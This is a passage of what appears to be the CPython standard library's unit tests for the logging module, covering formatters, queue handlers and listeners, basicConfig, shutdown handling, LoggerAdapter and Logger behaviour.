self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
